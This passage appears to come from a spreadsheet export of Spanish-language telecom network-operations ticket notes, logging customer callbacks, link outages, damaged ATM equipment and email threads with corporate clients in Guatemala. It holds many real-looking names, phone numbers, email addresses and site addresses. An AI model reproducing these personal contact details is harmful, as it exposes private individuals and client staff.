    <t>SE LLAMA A CLIENTE CARLOS DE LEON AL 24207200 EXT 2395, QUIEN INDICA QUE SE TIENE ACCESO AL CAJERO PERO CON TIEMPOS ALTOS, SE REALIZAR DIAGNOSTICO SEGUN LO INDICADO POR CLIENTE
2001226811
COLA:
NOMBRE: A: 24207200
NÚMERO: 24207200
DURACIÓN: 0:03:01
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207200
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 25/05/2022 17:05:28</t>
  </si>
  <si>
    <t>F4577187</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 25 DE MAYO DE 2022 15:32PARA: FESQUIVEL@DISTELSA.COM.GT &lt;FESQUIVEL@DISTELSA.COM.GT&gt;; DROSALES@DISTELSA.COM.GT &lt;DROSALES@DISTELSA.COM.GT&gt;; KSABALLOS@DISTELSA.COM.GT &lt;KSABALLOS@DISTELSA.COM.GT&gt;; LPEREZ@DISTELSA.COM.GT &lt;LPEREZ@DISTELSA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_DISTELSA_GT_CC_LA_TRINIDAD_RE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7187
ID: 61200101T
IDENTIFICADOR DEL CLIENTE:  CC_DISTELSA_GT_CC_LA_TRINIDAD_REU
UBICADO EN:  01 CALLE Y 5TA AVENIDA A Z. 5 RETALHULEU C.C. LA TRINIDAD
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577190</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CAROLINA AGUILAR- 76012593 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001195841</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILLIAM 79014237 MENCIONA QUE EL SERVICIO ES MUY LENTO, CLIENTE MENCIONA QUE TIENE CONTRATADO 5  MBPS
-ID 2001196088</t>
  </si>
  <si>
    <t>F4577195</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON ESTURBA AL 55135087 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
ID 2001273369
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON ESTURBA AL 55135087 INDICA QUE YA ESTA LA CERRADA LA SUCURSAL SOLICITA QUE SE LE LLAME MAÑANA DE 7:30 AM  **
ID 2001226232
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON ESTURBA AL 55135087 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001218735
**</t>
  </si>
  <si>
    <t>F4577204</t>
  </si>
  <si>
    <t>SE CONTACTA CON TEC OSCAR CAYAX 58266635 PARA VALIDAR LOS AVANCES DE LA FALLA PERO NOS MANDA A BUZON, SE LLAMARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO COZ AL 35654073  CONFIRMA SERVICIO ESTABLE PERO SOLICITA QUE SE LE LLAME EL DIA LUNES A LAS 16:30 PM  YA QUE LE HA DADO MUCHOS INCONVENIENTES ENTONCES LO TENDRA EN OBSERVACION **
ID 2001401472 - 2001401646
**</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE JULIO COTZ A QUIEN SE LE INDICO QUE SE APLICO UN RESET Y SOLICITA QUE SE LE LLAME NUEVAMENTE EL DIA DE MAÑANA A LAS 15:00HRS PARA VER COMO HA FUNCIONADO EL SERVICIO.
2001198640
COLA:
NOMBRE: A: 35654073
NÚMERO: 35654073
DURACIÓN: 0:00:53
ESTADO: CONECTADA
DETALLES: 35654073
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 25/05/2022 15:30:54</t>
  </si>
  <si>
    <t>SE SOLICITAN DATOS DE VISITA TECNICA
NOMBRE DEL CLIENTE: MUNICIPALIDAD DE SALCAJA._
UBICACIÓN: 1 CALLE 2-28 ZONA 1 SALCAJA QUETZALTENANGO.
CONTACTO EN SITIO: JULIO COZ 35654073
HORARIO DE ATENCION:8:00 - 17:00
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN 7963-3939 LLAMADA COMPLETA. A LAS 16:30 QUE TERMINE EL TIEMPO DE MONITOREO. SE PROCEDERÁ AL CIERRE DEL CASO.
3001133054
COLA:
NOMBRE: A: 79633939
NÚMERO: 79633939
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 79633939
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 30/05/2022 16:04:11</t>
  </si>
  <si>
    <t>F4577209</t>
  </si>
  <si>
    <t>CLIENTE EN PUNTO REMOTO 50506237 FERNANDO ENTERADO DE VISITA, SIGUE EN SITIO
2001212276
COLA:
NOMBRE: A: 50506237
NÚMERO: 011 50250506237
DURACIÓN: 0:01:04
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: +50250506237
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 25/05/2022 16:14:57</t>
  </si>
  <si>
    <t>F4577210</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE
-----MENSAJE ORIGINAL-----
DE: COORDINACIÓN DE ATM¿S &lt;CAJEROS@FORZALATAM.COM&gt; ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 14:35
PARA: CARLOS ENRIQUE DE LEON &lt;CEDELEON@5B.COM.GT&gt;
CC: CAJEROS BETA &lt;CAJEROS@BETA.COM.GT&gt;; MONITOREO FALLAS ATM &lt;MONITOREOFALLASATM@5B.COM.GT&gt;; SERVICIOS 5B &lt;SERVICIOS5B@5B.COM.GT&gt;; NICZON ELIAS &lt;NCARIAS@BETAPRONCR.COM&gt;; COORDINACIÓN DE ATM¿S &lt;CAJEROS@FORZALATAM.COM&gt;
ASUNTO: RE: CAJEROS - ACCESOS ATM 420
BUENAS TARDES.
INFORMANDO QUE TÉCNICO PROCEDE A REVISIÓN DE ATM, SE ENCUENTRA PROCESADOR QUEMADO Y UPS, ADICIONAL EL ROUTER ESTA DAÑADO, ES NECESARIO COORDINAR VISITA PARA REVISIÓN O CAMBIO DE ROUTER Y ASÍ PODER COORDINAR VISITA PARA CAMBIO DE LOS DISPOSITIVOS DAÑADOS.
QUEDO A LA ESPERA DE SUS COMENTARIOS PARA COORDINAR VISITA PARA MAÑANA.
SALUDOS.
*-**-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE RESPONDE MOISES MENCIONA QUE APARENTEMENTE PRESENTARON PROBLEMA DE ENERGIA EN PR Y ESO OCACIONO QUE SE QUEMARAN LOS EQUIPOS
-ID 2001225893</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE CARLOS ENRIQUE DE LEON AL 2420-7200 EXT 2395 CONTESTA EL SEÑOR  MILTO MORATAYA QUIEN INDICA QUE ESTA REALIZANDO PRUEBAS PERO AUN ESTA FUERA SE LE INFORMA QUE LE INFORMA QUE SE TIENE DAÑO CON LOS EQUIPOS DE 5B INDICA QUE TRASLADARA LA LLAMADA A MONITOREO PERO SE CORTA LLAMADA SE INTENTARA LUEGO **
ID 2001383537
**
**</t>
  </si>
  <si>
    <t>F4577211</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GABRIELA ALVAREZ AL 22407528 INDICA QUE ELLA NO HA REPORTADO NADA DE CHALATENANGO || SE NOTIFICA A GESTOR **
ID 2001219904
**</t>
  </si>
  <si>
    <t>F4577214</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE IVAN ZABALA 46521050 MENCIONA QUE YA TODO ESTA FUNCIONANDO DE MANERA CORRECTA
-ID 2001220809</t>
  </si>
  <si>
    <t>F4577216</t>
  </si>
  <si>
    <t>SE LLAMA A CLIETNE LEYLA MORENO  81138040 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001202865 - 2001203019</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANGELO CALDERA 89661010 MENCIONA QUE NO TIENE OTRO CONTACTO POR LO QUE SE ESTARA CONTACTANDO CON PERSONAL DE NI PARA PROPORCIONAR OTRO NUMERO DE PR
-ID 2001203610</t>
  </si>
  <si>
    <t>F4577229</t>
  </si>
  <si>
    <t>SE MANDA CORREO A CLIENTE SOLICITANDO ACCESOS</t>
  </si>
  <si>
    <t>F4577237</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE AGENTE MORALES AL 79214838 N O RESPONDE, SE INTENTARA LUEGO **
ID 2001223887
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGENTE MORALES 79214838 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001233368</t>
  </si>
  <si>
    <t>F4577245</t>
  </si>
  <si>
    <t>-* SE HABLA CON  ROLAN OTONIEL LIGORRIA (CLIENTE) INFORMA QUE HA PRESENTADO DOS CAIDAS EN EL TRANSCURSO DE LA TARDE, SOLICITA SE COMPARTA EL REGISTRO  DE PRUEBAS VIA CORREO YA QUE EL FIN DE SEMANA LE INDICARO QUE SE APLICARON CAMBIOS SIN EMBARGO SOLO DIERON SOLUCION TEMPORAL -*
-*</t>
  </si>
  <si>
    <t>F4577247</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77247
ID:  8900656T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_0464
UBICADO EN:   ALDEA CHILOL KM.30 LOTE 55 SAN JUAN SACATEPEQUEZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577249</t>
  </si>
  <si>
    <t>CLIENTE VICTOR AMAYA 71080454 COMENTA QUE EL SERVICIO SE OBSERVA ESTABLE, SOLICITA SE VALIDE AL MEDIO DÍA.</t>
  </si>
  <si>
    <t>F4577251</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILVER MAGAÑA AL  30060665 NO RESPONDE, ENVIA A BUZON ||  SE INTENTARA LUEGO **
ID 2001225137
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WILVER MAGAÑA 30060665 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001230033</t>
  </si>
  <si>
    <t>F4577252</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 82449094 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001209798</t>
  </si>
  <si>
    <t>F4577254</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BLADIMIR SANTOS 58266179 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001230635</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BLADIMIR SANTOS 58266179 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001222635</t>
  </si>
  <si>
    <t>F4577285</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR CHOJOLAN 22857708 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001224292</t>
  </si>
  <si>
    <t>F4577286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CRISTIAN COLOC 44614261 INFORMA QUE REINICIARON EL ROUTER Y UN CABLE ESTABA MAL CONECTADO EN SU RED INTERNA, VALIDA ENLACE SE PROCEDE AL CIERRE.... ID: 2001241493.</t>
  </si>
  <si>
    <t>F4577288</t>
  </si>
  <si>
    <t>POR TEMA DE REINICIA POR REINICIO SE LLAMA A LA AGENCIA, CONTESTA CANDY HERNANDEZ COMENTA QUE NO LOGRA TRANSFERIR LLAMADA A LA AGENCIA.
2001212283
COLA:
NOMBRE: A: 1720
NÚMERO: 23398888
DURACIÓN: 0:06:25
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:NORMAL, ESPECIFICADA (CÓDIGO CAUSA ISDN31)]
DETALLES: 23398888
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 25/05/2022 16:20:42</t>
  </si>
  <si>
    <t>SE LLAMA A LOS TELEFONOS INIDICADOS EN PAGINA WEB PERO NO SE RECIBE RESPUESTA.
2001217671
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 25/05/2022 16:30:36</t>
  </si>
  <si>
    <t>F4577294</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE JOSE MONZON 58597727 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001213778</t>
  </si>
  <si>
    <t>F4577295</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MENCIONA QUE LO OBSERVA INESTABLE Y CON TIEMPOS ALTOS, SOLICITA SE PUEDA VALIDAR
SE NOTIFICARA A GESTOR PARA EL SEGUIMIENTO
-ID 2001325262</t>
  </si>
  <si>
    <t>SEGÚN CRONOLOGÍA SIGUE LA AFECTACIÓN Y NO HAY  MOVIMIENTO DE ESTADO DESDE LAS 10:44:09  HORAS  Y NO HAY INFORMACIÓN DE ALGO PENDIENTE POR PARTE DEL CLIENTE,  POR TAL RAZÓN SE PASA A WIP, COMPAÑEROS FAVOR INDICAR QUE ES LO PENDIENTES CON EL CLIENTE PARA EL APOYO A CONTACTARLO Y DAR EL SEGUIMIENTO Y NO AFECTARLOS EN CAMBIAR EL ESTADO. SE NOTIFICA VÍA SKYPE AL GESTOR JHONNSER.ESCOBAR  POR EL CAMBIO Y BRINDAR EL SEGUIMIENTO.</t>
  </si>
  <si>
    <t>-* ANIBAL GONZALEZ 44990369 (CLIENTE)  NO RESPONDE, SE LLAMARA LUEGO
2001251180
2001251450</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS. ADICIONAL SE LLAMÓ/HABLÓ CON ANIBAL GONZÁLEZ/CLIENTE 44990369 CONFIRMA QUE ENLACE MEJORÓ DE MODO CONSIDERABLE DESPUÉS DE LAS 14:00 HORAS, PIDE SE DEJE EN MONITOREO PARA MAÑANA A LAS 12:00PM</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ   AL 44990369 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 2001295601
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANIBAL GONZALEZ   AL 44990369 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001274400
**</t>
  </si>
  <si>
    <t>F4577322</t>
  </si>
  <si>
    <t>SE LLAMA A TEXMEX 52 55 5174 5290 ID: 2001247156 /
ATIENDE:  ROBERTO GARCIA,  CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT, SE NOTIFICA A AXELS.LOPEZ VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4577323</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 59678338 MENCIONA QUE EL SERVICIO HA ESTADO INESTABLE SE DEJA EN CONFERENCIIA CON GESTOR
-ID 2001238103</t>
  </si>
  <si>
    <t>F4577333</t>
  </si>
  <si>
    <t>NOTA: SE VALIDA QUE SE PERCIBIO CAIDAS A NIVEL WAN POR INCONVENIENTES PRESENTADOS EN NODO SE TRABAJO CON F4576868
REALIZA CAMBIO DE TOMA A CONTINUO , YA SE REPORTO A ENERGUATE EL PROBLEMA Y SE CONECTA A MOTOR--- ULTIMA CAIDA DEL SERVICIO FUE APROXIMADAMENTE 1 HORA-</t>
  </si>
  <si>
    <t>F4577339</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 82449094 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001239863</t>
  </si>
  <si>
    <t>F4577350</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 46153837 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001381083</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VICTOR PERALTA  46153837 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001362907</t>
  </si>
  <si>
    <t>F4577352</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7352¿
ID: 86100023T
IDENTIFICADOR DEL CLIENTE: CC_CERVECERIA_GT_AGENCIA_NARANJO_PETEN
UBICADO EN: CALLE HACIA EL DESATACAMENTO MILITAR, ALDEA EL NARANJO, LA LIBERTAD PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577356</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NERY ESPINOZA 97380352 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001232897 - 2001233084</t>
  </si>
  <si>
    <t>F4577361</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001288831</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA VALIDAR EL FUNCIONAMIENTO
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 8:07
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; WALTER ANIBAL REYES &lt;WALTER.REYES@SOMOSCMI.COM&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; NOC ALIMENTOS &lt;NOC.ALIMENTOS@SOMOSCMI.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CMIA_REDES &lt;CMIA_REDES@SOMOSCMI.COM&gt;; PEDRO JACOBO PAREDES LOPEZ &lt;JACOBO.PAREDES@SOMOSCMI.COM&gt;; CARLOS RENE PORTILLO SEN &lt;CARLOS.PORTILLO@SOMOSCMI.COM&gt;; MANUEL GREGORIO COLMENARES AVILA &lt;MANUEL.COLMENARES@SOMOSCMI.COM&gt;
ASUNTO: RE: FALLA ENLACE GRANJA AVICOLA SAN RAYMUNDO_5800037
*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NO RESPONDE, SE IUNTENTARA LUEGO
-ID 2001271013</t>
  </si>
  <si>
    <t>F4577381</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AZUCENA MARTINEZ, QUIEN INDICA QUE SI HA TENIDO APAGONES.
INDICA QUE EL UPS NO ESTA ENERGIZADO.
2001239402, 2001239493
COLA:
NOMBRE: A: 0050376032932
NÚMERO: 0050376032932
DURACIÓN: 0:00:20
ESTADO: MARCANDO
DETALLES: 0050376032932
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 25/05/2022 17:55:40</t>
  </si>
  <si>
    <t>F4577385</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR SAUL ORELLANA  CONFIRMA SERVICIO ESTABLE **
AUTORIZA CIERRE DE TICKET **
ID 2001267419
**</t>
  </si>
  <si>
    <t>F4577386</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN EL SITIO,// QUEDAMOS ATENTOS A LA RESPUESTA POR PARTE DE CLIENTE
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 26 DE MAYO DE 2022 11:06
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MIGUEL ANGEL DURAN CHICAS &lt;MIGUEL.DURAN@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: FONSECA BUSTAMANTE, KEVYN ANTONIO &lt;KEVYN.FONSECA@CLARO.COM.GT&gt;; MOISES AARON SALAZAR LECHUGA &lt;MOISES.SALAZAR@CLARO.COM.GT&gt;
ASUNTO: RE: APERTURA FALLA 8900244T
BUEN DÍA ESTIMADO CLIENTE UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADOS SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS DE INGRESO PARA EL PERSONAL TÉCNICO QUE SE PRESENTARA EN SITIO.
DIRECCIÓN:  19 AVENIDA 3-60 SECTOR B6 LOCAL COMERCIAL SAN CRISTOBAL ZONA 8 DE MIXCO
ADJUNTAMOS LOS DATOS DE LOS TÉCNICOS.
NOMBRE 	IBM       ///  DPI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S COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>SE CONTACTA AL PR PARA LAS PRUEBAS QUE CORRESPONDEN AL 56303225  CON CARINA GARCIA ID 2001285656  SE LE COMENTA Y ESTA DISPONIBLE PARA LAS PRUEBAS SE CONTACTA CON EL GESTOR JAIMEJ.HERNANDEZ AL 8126 ID 2001285976 SE DEJA EN LINEA</t>
  </si>
  <si>
    <t>F4577406</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON DANIEL IXCAPTAP JUAREZ AL 47706336 INFORMA QUE NO ESTA EN SITIO SOLICITA QUE SE LE LLAME AL SEÑOR  EMERSON RIVERA AL 55593760 || SE NOTIFICA A GESTOR INDICA QUE EL ESTARA LLAMANDOLE **
ID 2001274700
**</t>
  </si>
  <si>
    <t>SE VALIDA QUE YA SE CONTACTARON CON EL NUMERO OTORGADO PARA LAS PRUEBAS CON GERSON DANIEL IXCAPTAP JUAREZ
AL +502 47706336 SIN EMBARGO COMENTA QUE LE LLAMEN A EMERSON RIVERA Y NO SE HAN CONTACTADO, SE PROCEDE A LLAMAR AL PR AL  + 502 55593760 ID 2001291332 ATIENDE SE LE BRINDA LA INFORMACIÓN Y ESTA EN EL PR SE TRASFIERE CON EL GESTOR DARWINH.ESPANA AL 8126 ID 2001292015 PERO ATIENDE JOSE OCHOA QUIEN COMUNICARA A DARWIN Y TRANSFIERE A LUVY SANDOVAL QUIEN COMENTA QUE ESTA EN LLAMADA DARWIN Y COMENTA QUE VA A TRANSFERIR CON ALGÚN GESTOR LIBRE Y CONTACTA A DARWIN QUIEN YA SE DESOCUPO SE DEJA CON EL PR EN LINEA</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE GERSON DANIEL IXCAPTAP JUAREZ AL 47706336 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001265349
**</t>
  </si>
  <si>
    <t>F4577559</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAMIRO AL 54385570 NO RESPONDE, SE INTENTARA LUEGO **
ID 2001265499
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 54385570 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001272063</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAMIRO AL 54385570 CONTESTA EL SEÑOR MARCOS INDICA QUE NO SE ENCUENTRA EN SITIO SE LE PREGUNTA OTRO NUMERO O LA HORA PARA LLAMAR NUEVAMENTE PERO NO LO BRINDA Y CORTA LLAMADA **
ID 2001287651
**</t>
  </si>
  <si>
    <t>F4577588</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO REYES - 78334835 MENCIONA QUE SIGUEN OBSERVANDO EL SERVICIO CAIDO, SE TRATA DE DEJAR EN CONFERENCIA CON GESTOR PERO CLIENTE CORTA LA LLAMADA
SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001275686</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROBERT DUEÑAS 25148976 QUIEN BRINDA EL CONTACTO FRANCISCO REYES - 78334835
-ID 2001274380</t>
  </si>
  <si>
    <t>F4577650</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAYNOR LARIOS AL 66209720 EXT 113021 CONTESTA EL SEÑOR CARLOS CONFIRMA SERVICIO ESTABLE Y OPERATIVO . AUTORIZA CIERRE DE TICKET **
ID 2001266141
**</t>
  </si>
  <si>
    <t>***--- SE HABLOA CON MYNOR LARIOS (CLIENTE) INDICA QUE ESTE ENLACE ES BACK UP POR LO QUE MAÑANA HARAN LAS PRUEBAS Y SOLICITA EL TICKET SE MANTENGA EN MONITORE TODO EL DÍA DE MAÑANA HASTA QUE ELLOS LLAMEN PARA HACER PRUEBAS EN CONJUNTO CON UN GESTOR DEL CNOC --***</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL CONFIRMANDO EL MONITOREO  ---**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 00:06
PARA: MAYNOR LARIOS &lt;MAYNORLARIOS@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: REVISION ENLACE GUATEFACTURAS CLARO ID: 86100041
BUENOS DÍAS ESTIMADO SR. LARIOS.
                RESPECTO A SOLICITUD,  CON GUSTO SE SOLICITO AL PERSONAL DEL CNOC MANTENER EL SERVICIO EN MONITOREO.
QUEDAMOS AL PENDIENTE DE SU COMUNICACIÓN PARA LAS PRUEBAS MENCIONADAS.
CUALQUEIR CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: MAYNOR LARIOS [MAILTO:MAYNORLARIOS@ICASA.COM.GT]
ENVIADO EL: MIÉRCOLES, 25 DE MAYO DE 2022 23:58
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REVISION ENLACE GUATEFACTURAS CLARO ID: 86100041
BUENA NOCHES,
FAVOR NO CERRAR EL TICKET.
ESTE ENLACE EN ESTOS MOMENTOS LO TENEMOS COMO BACKUP. EL DIA DE MAÑANA ESTAREMOS REALIZANDO PRUEBAS DE REDUNDANCIA Y OCUPAMOS EL APOYO DURANTE LAS PRUEBAS.
ESTAREMOS CONFIRMANDO HORARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>F4577724</t>
  </si>
  <si>
    <t>EN SEGUIMIENTO A CRONOLOGÍA DE LA FALLA NO HAY REPUESTA EN LA COLA DE CORREOS SOLICITANDO ALGÚN NUMERO QUE POSEA WHATS APP PARA ENVIÓ DE INFORMACIÓN DE EQUIPOS EN EL SITIO, SE VALIDA QUE HAY CONTACTOS EN EL PR QUIEN ES
 EDWIN DEL CID 44330620  / 55917290 SE LE LLAMA AL 55917290 PARA VALIDAR SI NOS PUEDE APOYAR ID 2001322055 SIN EMBARGO COMENTA QUE ESTA EN REUNIÓN Y BRINDA EL CONTACTO DE CARLOS SANDOVAL  AL 54242375 SE CONTACTA ID 2001322862 Y SE LE BRINDA LA INFORMACIÓN EN EL CUAL COMENTA QUE SE LE ARRUINO EL UPS POR LA MADRUGADA Y SE APAGARON LOS EQUIPOS, POR TAL RAZÓN SE QUEDARON SIN SERVICIO, SIN EMBARGO YA COLOCARON UN NUEVO UPS Y DESDE LAS 07:30 HORAS  YA CUENTAN CON SERVICIO Y ESTA OPERATIVO, POR TAL RAZÓN NO ES NECESARIO REALIZAR ALGUNA INTERVENCIÓN Y SE PROCEDE EL CIERRE DE LA FALLA PENDIENTE EL CIERRE DEL TICKET VALIDARLO CON LA SD SE NOTIFICA AL GESTOR MARLON RAMOS  EL CAMBIO VIA SKYPE</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL INDICANDO QUE SE NECESITAN HACER PRUENAS CON PR U EN 1 OCASIÓN NO HANIAN CONTESTADO PERO YA SE ESTA MARCANDO DE NUEVO --** APOYA IVAN DE CNOC PARA OBTENETR ESTA INFORMACIÓN
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: JUEVES, 26 DE MAYO DE 2022 04:57
PARA: WILSON LUNA &lt;WILSONLUNA@ICASA.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: TELECOMUNICACIONES VPC &lt;TELECOMVPC@ICASA.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
